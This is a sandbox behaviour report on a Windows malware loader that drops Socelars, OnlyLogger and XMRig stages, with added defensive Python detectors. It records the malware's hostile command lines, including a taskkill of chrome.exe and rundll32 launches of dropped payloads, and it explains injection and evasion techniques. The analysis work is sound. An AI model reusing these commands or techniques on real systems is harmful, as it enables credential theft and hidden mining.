Malware Analysis Report

2024-11-13 19:46

Sample ID 220725-fyf1magdan
Target 562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c
SHA256 562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c
Tags
onlylogger socelars xmrig loader miner spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c

Threat Level: Known bad

The file 562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c was found to be: Known bad.

Malicious Activity Summary

onlylogger socelars xmrig loader miner spyware stealer

Socelars payload

xmrig

Socelars

Process spawned unexpected child process

OnlyLogger

XMRig Miner payload

OnlyLogger payload

Downloads MZ/PE file

Executes dropped EXE

Unexpected DNS network traffic destination

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Program crash

Enumerates physical storage devices

NSIS installer

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Modifies registry class

Kills process with taskkill

Script User-Agent

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-07-25 05:16

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-07-25 05:16

Reported

2022-07-25 05:19

Platform

win10v2004-20220721-en

Max time kernel

128s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

Signatures

OnlyLogger

loader onlylogger

Process spawned unexpected child process

Child: C:\Windows\system32\rundll32.exe
Parent: C:\Windows\system32\wbem\wmiprvse.exe (a parent that is not expected to spawn this process)
WmiPrvSE.exe is the parent of any process created through WMI (Win32_Process.Create), so the usual reading of this edge is that one of the stages launched rundll32.exe via WMI instead of calling CreateProcess directly, which detaches the rundll32.exe instance from the visible process tree of the dropper.

Socelars

stealer socelars

Socelars payload

2 matches (the sandbox recorded no indicator, process or target for either)

xmrig

miner xmrig

OnlyLogger payload

2 matches (the sandbox recorded no indicator, process or target for either)

XMRig Miner payload

miner
9 matches (the sandbox recorded no indicator, process or target for any of them)

Downloads MZ/PE file

Executes dropped EXE

Process (number of executions recorded; Indicator and Target were empty for every row):
C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe (1)
C:\Users\Admin\AppData\Local\Temp\mali.exe (2)
C:\Users\Admin\AppData\Local\Temp\inst1.exe (1)
C:\Users\Admin\AppData\Local\Temp\setup.exe (1)
C:\Users\Admin\AppData\Local\Temp\askinstall63.exe (1)
C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe (1)
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime1.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime2.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime3.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime4.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime5.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime6.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime7.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime8.exe (1)
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe (5)
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (9)
C:\Users\Admin\AppData\Local\Temp\Chrome6.exe (9)
C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe (1)
C:\Windows\system32\services64.exe (5)
C:\Windows\system32\Microsoft\Libs\sihost64.exe (4)
49 executions in total. The two System32 entries are the only dropped executables outside the user's Temp directory.

Checks computer location settings

Key value queried: \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation
Querying process (number of queries; Target was empty for every row):
C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe (1)
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (9)
C:\Users\Admin\AppData\Local\Temp\mali.exe (1)
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe (1)
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime1.exe through anytime8.exe (1 each)
21 queries in total. Geo\Nation holds the GEOID of the country configured in the user's Region settings; reading it at startup is the usual way a loader decides whether to run at all in a given region, so a sandbox whose locale does not match the operator's target list may see a stage exit early without showing its payload.

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Drops file in System32 directory

Writing process for every row: C:\Windows\System32\conhost.exe (Target was empty)
C:\Windows\system32\services64.exe: File created (4), File opened for modification (7)
C:\Windows\system32\Microsoft\Libs\sihost64.exe: File created (1), File opened for modification (3)
C:\Windows\system32\Microsoft\Libs\WR64.sys: File created (2), File opened for modification (2)
19 rows in total. Creating files directly under System32 needs an elevated administrator token (a non-elevated legacy process would have its writes redirected to VirtualStore), so the stage running as conhost.exe was already elevated. services64.exe and sihost64.exe shadow the legitimate services.exe and sihost.exe names, and Microsoft\Libs is not a standard System32 subdirectory. A genuine conhost.exe neither writes files into System32 nor sets thread contexts in other processes (see the next signature), so the conhost.exe instances in this run are injection hosts for the miner stage, not console hosts.

Suspicious use of SetThreadContext

Four injections, each from a C:\Windows\System32\conhost.exe instance into a C:\Windows\explorer.exe instance (Indicator was empty):
PID 4668 -> PID 5240
PID 4816 -> PID 5388
PID 4732 -> PID 5024
PID 4212 -> PID 5476
Setting another process's thread context is the last step of process hollowing or thread hijacking: after writing a payload into the target, the injector points a thread's instruction pointer at it. The targets are four distinct explorer.exe PIDs, so each miner launch created its own explorer.exe to live in; the four conhost.exe source PIDs are the injection hosts noted under the System32 drops above.
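The System32 drops and the SetThreadContext calls above share one actor, an image named conhost.exe, doing two things the real conhost.exe never does. The following Python detector is an added example (mine, not the sandbox's detection logic): it takes rows in the report's four-column shape and flags (a) a thread-context write from an image on a never-injects list, (b) that same actor creating files under System32, and (c) dropped file names that shadow a System32 binary by inserting 64 before the extension, as services64.exe and sihost64.exe do. The never-injects set and the shadowed-name list are assumptions for illustration; the sample rows are copied from this report plus one constructed benign row to show the rules stay quiet on ordinary installer activity.

```python
import re
from collections import namedtuple

# One row of the report's four-column signature tables.
Row = namedtuple("Row", "description indicator process target")

# Images that never legitimately set another process's thread context or write
# executables into System32. conhost.exe is the one this report shows; the set
# itself is an assumption for illustration, not something the report states.
NEVER_INJECTS = {"conhost.exe"}

# Legitimate System32 image names that dropped files imitate by inserting
# "64" (services64.exe -> services.exe). Heuristic list, also an assumption.
SHADOWED_SYSTEM_NAMES = {"services.exe", "sihost.exe", "svchost.exe",
                         "lsass.exe", "csrss.exe", "winlogon.exe"}

SYSTEM32 = re.compile(r"^c:\\windows\\system32\\", re.IGNORECASE)
SET_CTX = re.compile(r"^PID (\d+) set thread context of (\d+)$")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def masquerade_of(name):
    """Legitimate name that `name` imitates by inserting 64/x64/32 before the
    extension, or None. services64.exe -> services.exe; wr64.sys -> None."""
    lowered = name.lower()
    stripped = re.sub(r"(x?64|32)(?=\.(exe|sys|dll)$)", "", lowered)
    if stripped != lowered and stripped in SHADOWED_SYSTEM_NAMES:
        return stripped
    return None


def detect(rows):
    """Return de-duplicated findings as tuples, in first-seen order.
    Repeated sandbox rows (created / opened for modification) collapse to one."""
    findings = []

    def add(finding):
        if finding not in findings:
            findings.append(finding)

    for r in rows:
        actor = basename(r.process)
        m = SET_CTX.match(r.description)
        if m and actor in NEVER_INJECTS:
            add(("injection", r.process, r.target,
                 int(m.group(1)), int(m.group(2))))
        elif r.description in ("File created", "File opened for modification"):
            if actor in NEVER_INJECTS and SYSTEM32.match(r.indicator):
                add(("system32-drop", r.process, r.indicator))
            shadow = masquerade_of(basename(r.indicator))
            if shadow:
                add(("masquerade", r.indicator, shadow))
    return findings


# Rows copied from this report, plus one constructed benign control: setup.exe
# writing a file into its own Temp directory, which should produce no finding.
SAMPLE_ROWS = [
    Row("PID 4668 set thread context of 5240", "N/A",
        r"C:\Windows\System32\conhost.exe", r"C:\Windows\explorer.exe"),
    Row("File created", r"C:\Windows\system32\services64.exe",
        r"C:\Windows\System32\conhost.exe", "N/A"),
    Row("File opened for modification", r"C:\Windows\system32\services64.exe",
        r"C:\Windows\System32\conhost.exe", "N/A"),
    Row("File created", r"C:\Windows\system32\Microsoft\Libs\sihost64.exe",
        r"C:\Windows\System32\conhost.exe", "N/A"),
    Row("File created", r"C:\Windows\system32\Microsoft\Libs\WR64.sys",
        r"C:\Windows\System32\conhost.exe", "N/A"),
    Row("File created", r"C:\Users\Admin\AppData\Local\Temp\inst1.exe",
        r"C:\Users\Admin\AppData\Local\Temp\setup.exe", "N/A"),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_ROWS):
        print(*finding)
```

On the sample rows the detector reports one injection (conhost.exe PID 4668 into explorer.exe PID 5240), three System32 drops and two masquerades (services64.exe and sihost64.exe); WR64.sys is a drop but not a masquerade, because "wr.sys" shadows nothing, and the benign setup.exe row produces nothing. In production the never-injects set would come from a baseline of your own endpoints rather than from one report.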

Enumerates physical storage devices

NSIS installer

installer
4 matches (the sandbox recorded no indicator, process or target for any of them)

Kills process with taskkill

evasion
Process: C:\Windows\SysWOW64\taskkill.exe (1 row; the command line, and therefore the process that was killed, was not recorded)

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe N/A

Script User-Agent

HTTP User-Agent header: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
This is the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object, so the request came from script (VBScript, JScript or PowerShell driving that object) or from native code using it, not from a browser. It is a cheap proxy-log pivot: few legitimate applications send this string.

Suspicious behavior: EnumeratesProcesses

Process (number of rows; Indicator and Target were empty for every row):
C:\Windows\System32\conhost.exe (18)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (46)

Suspicious behavior: LoadsDriver

1 match; the sandbox did not record which driver was loaded or by which process.
The only driver file in this report is C:\Windows\system32\Microsoft\Libs\WR64.sys, dropped by the conhost.exe stage (see Drops file in System32 directory). Its name and location are consistent with the WinRing0 driver that XMRig ships for MSR access; WinRing0 carries a valid signature, which is why a miner can still load it under driver signature enforcement. The report itself does not name the driver, so treat that attribution as an inference to confirm against the dropped file's hash.

Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe: 34 adjustments covering every well-known privilege LUID from 2 to 35, in order:
SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, and the unnamed LUIDs 31, 32, 33, 34 and 35.
The sandbox printed the last five by number only; in winnt.h those values are SeTrustedCredManAccessPrivilege (31), SeRelabelPrivilege (32), SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34) and SeCreateSymbolicLinkPrivilege (35). A gap-free run from 2 to 35 is the footprint of a loop over SE_MIN_WELL_KNOWN_PRIVILEGE..SE_MAX_WELL_KNOWN_PRIVILEGE as defined in pre-Windows 10 SDK headers: the process enables everything its token holds rather than asking for a specific right. AdjustTokenPrivileges cannot add privileges the token does not already have, so the list shows intent, not rights gained.

SeDebugPrivilege only (the right needed to open processes owned by other users or SYSTEM, i.e. the prerequisite for the injection seen elsewhere in this run):
C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe (1)
C:\Users\Admin\AppData\Local\Temp\anytime1.exe through anytime8.exe (1 each)
C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe (5)
C:\Windows\SysWOW64\taskkill.exe (1)
C:\Windows\System32\conhost.exe (9)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (6)
Indicator and Target were empty for every row.
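The askinstall63.exe rows are the footprint of a loop that enables every well-known privilege, and the sandbox left five of the LUIDs unresolved. The following Python helper is an added example (mine, not part of the sandbox report or its tooling): it resolves numeric LUIDs with the SE_*_PRIVILEGE values from winnt.h, parses rows in the flattened "Token: <name or LUID> N/A <process> N/A" layout used above, and separates processes that enable the whole 2..35 range from those that adjust a specific right. The sample input is reconstructed from the rows above; the row layout is an assumption about how this report was exported, and the 2..35 range is the older SDK's well-known-privilege range, not something the report states.

```python
import re
from collections import defaultdict

# Well-known privilege LUIDs as defined by the SE_*_PRIVILEGE constants in winnt.h.
# The sandbox printed names for 2..30 and bare numbers for 31..35.
PRIVILEGE_BY_LUID = {
    2: "SeCreateTokenPrivilege", 3: "SeAssignPrimaryTokenPrivilege",
    4: "SeLockMemoryPrivilege", 5: "SeIncreaseQuotaPrivilege",
    6: "SeMachineAccountPrivilege", 7: "SeTcbPrivilege",
    8: "SeSecurityPrivilege", 9: "SeTakeOwnershipPrivilege",
    10: "SeLoadDriverPrivilege", 11: "SeSystemProfilePrivilege",
    12: "SeSystemtimePrivilege", 13: "SeProfSingleProcessPrivilege",
    14: "SeIncBasePriorityPrivilege", 15: "SeCreatePagefilePrivilege",
    16: "SeCreatePermanentPrivilege", 17: "SeBackupPrivilege",
    18: "SeRestorePrivilege", 19: "SeShutdownPrivilege",
    20: "SeDebugPrivilege", 21: "SeAuditPrivilege",
    22: "SeSystemEnvironmentPrivilege", 23: "SeChangeNotifyPrivilege",
    24: "SeRemoteShutdownPrivilege", 25: "SeUndockPrivilege",
    26: "SeSyncAgentPrivilege", 27: "SeEnableDelegationPrivilege",
    28: "SeManageVolumePrivilege", 29: "SeImpersonatePrivilege",
    30: "SeCreateGlobalPrivilege", 31: "SeTrustedCredManAccessPrivilege",
    32: "SeRelabelPrivilege", 33: "SeIncreaseWorkingSetPrivilege",
    34: "SeTimeZonePrivilege", 35: "SeCreateSymbolicLinkPrivilege",
}
LUID_BY_PRIVILEGE = {name: luid for luid, name in PRIVILEGE_BY_LUID.items()}

# Range a pre-Windows 10 SDK calls SE_MIN_WELL_KNOWN_PRIVILEGE..SE_MAX_WELL_KNOWN_PRIVILEGE.
ALL_WELL_KNOWN = set(range(2, 36))

# Flattened row layout assumed for this report: "Token: <name|luid> N/A <process> N/A".
ROW = re.compile(r"^Token: (\S+) N/A (.+?) N/A$")


def parse_rows(text):
    """Yield (privilege_name, process_path); numeric tokens are resolved via winnt.h."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        token, process = m.groups()
        name = PRIVILEGE_BY_LUID.get(int(token), token) if token.isdigit() else token
        yield name, process


def classify(text):
    """Map each process to 'enable-all' when it touched every LUID in 2..35,
    otherwise to the sorted list of privileges it adjusted."""
    seen = defaultdict(set)
    for name, process in parse_rows(text):
        seen[process].add(name)
    verdicts = {}
    for process, names in seen.items():
        luids = {LUID_BY_PRIVILEGE[n] for n in names if n in LUID_BY_PRIVILEGE}
        verdicts[process] = "enable-all" if luids == ALL_WELL_KNOWN else sorted(names)
    return verdicts


# Sample reconstructed from the rows above: askinstall63.exe enables LUIDs 2..35
# (31..35 printed as numbers, as the sandbox did); anytime1.exe asks for SeDebug only.
ASK = r"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"
ANY1 = r"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
SAMPLE = "\n".join(
    [f"Token: {PRIVILEGE_BY_LUID[i]} N/A {ASK} N/A" for i in range(2, 31)]
    + [f"Token: {i} N/A {ASK} N/A" for i in range(31, 36)]
    + [f"Token: SeDebugPrivilege N/A {ANY1} N/A"]
)

if __name__ == "__main__":
    for process, verdict in classify(SAMPLE).items():
        print(process, "->", verdict)
```

A process classed as enable-all is not necessarily more dangerous than one asking for SeDebugPrivilege alone; the value of the split is that the two patterns come from different code (a generic "become as powerful as I can" prologue versus a targeted injection routine), which helps cluster the dropped binaries by author.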

Suspicious use of WriteProcessMemory

Collapsed to one line per parent -> child pair, with the number of writes in parentheses (Indicator was empty for every row). The sandbox records two or three writes per CreateProcess call, because the parent writes the child's startup parameters into its address space, so on its own each line is a launch edge, not evidence of injection.

PID 1444 C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe wrote to:
  PID 612  C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe (3)
  PID 1644 C:\Users\Admin\AppData\Local\Temp\mali.exe (3)
  PID 2084 C:\Users\Admin\AppData\Local\Temp\inst1.exe (3)
  PID 4568 C:\Users\Admin\AppData\Local\Temp\setup.exe (3)
  PID 4332 C:\Users\Admin\AppData\Local\Temp\askinstall63.exe (3)
  PID 3316 C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe (3)
  PID 2104 C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe (3)
  PID 5028 C:\Users\Admin\AppData\Local\Temp\anytime1.exe (2)
  PID 1104 C:\Users\Admin\AppData\Local\Temp\anytime2.exe (2)
  PID 1648 C:\Users\Admin\AppData\Local\Temp\anytime3.exe (2)
  PID 3456 C:\Users\Admin\AppData\Local\Temp\anytime4.exe (2)
  PID 4216 C:\Users\Admin\AppData\Local\Temp\anytime5.exe (2)
  PID 4976 C:\Users\Admin\AppData\Local\Temp\anytime6.exe (2)
  PID 732  C:\Users\Admin\AppData\Local\Temp\anytime7.exe (2)
  PID 4848 C:\Users\Admin\AppData\Local\Temp\anytime8.exe (2)
  PID 4440 C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe (2)
PID 1644 C:\Users\Admin\AppData\Local\Temp\mali.exe wrote to:
  PID 1340 C:\Users\Admin\AppData\Local\Temp\mali.exe (3) (the re-launched instance; the Processes section lists a second mali.exe started with -a)
PID 1648 C:\Users\Admin\AppData\Local\Temp\anytime3.exe wrote to:
  PID 2424 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (3)
PID 3456 C:\Users\Admin\AppData\Local\Temp\anytime4.exe wrote to:
  PID 4064 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (3)
PID 5028 C:\Users\Admin\AppData\Local\Temp\anytime1.exe wrote to:
  PID 3064 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (3)
PID 1104 C:\Users\Admin\AppData\Local\Temp\anytime2.exe wrote to:
  PID 4068 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (3)
PID 732 C:\Users\Admin\AppData\Local\Temp\anytime7.exe wrote to:
  PID 4924 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (3)
PID 4216 C:\Users\Admin\AppData\Local\Temp\anytime5.exe wrote to:
  PID 4564 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (3)
PID 4440 C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe wrote to:
  PID 1644 C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe (3)
PID 2104 C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe wrote to:
  PID 2412 C:\Windows\SysWOW64\control.exe (1)
64 rows in total.

Caveat: PID 1644 appears with two different images, mali.exe early in the run and LzmwAqmV.exe later as a child of bearvpn3.exe. Windows recycles a PID as soon as the process holding it exits, so a process tree keyed on the bare PID would hang the bearvpn3.exe child under mali.exe; key on (PID, image) or on (PID, start time) instead. Six of the anytime*.exe wrappers and bearvpn3.exe each launch a file named LzmwAqmV.exe from Temp, which together with the nine LzmwAqmV.exe executions recorded above points to one payload shipped under several installer wrappers.

Processes

C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

"C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe"

C:\Users\Admin\AppData\Local\Temp\inst1.exe

"C:\Users\Admin\AppData\Local\Temp\inst1.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe

"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe" -a

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"

C:\Users\Admin\AppData\Local\Temp\anytime4.exe

"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"

C:\Users\Admin\AppData\Local\Temp\anytime5.exe

"C:\Users\Admin\AppData\Local\Temp\anytime5.exe"

C:\Users\Admin\AppData\Local\Temp\anytime6.exe

"C:\Users\Admin\AppData\Local\Temp\anytime6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4568 -ip 4568

C:\Users\Admin\AppData\Local\Temp\anytime7.exe

"C:\Users\Admin\AppData\Local\Temp\anytime7.exe"

C:\Users\Admin\AppData\Local\Temp\anytime8.exe

"C:\Users\Admin\AppData\Local\Temp\anytime8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 796

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1032 -ip 1032

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 1456

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 832

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 580 -p 208 -ip 208

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1624 -s 1600

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 208 -s 1600

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1428 -s 1600

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 480 -p 1428 -ip 1428

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 576 -p 5032 -ip 5032

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 520 -p 1624 -ip 1624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3800 -ip 3800

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4564 -s 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1064 -ip 1064

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4564 -ip 4564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1644 -ip 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4924 -ip 4924

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 836

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome6.exe"

C:\Windows\System32\conhost.exe

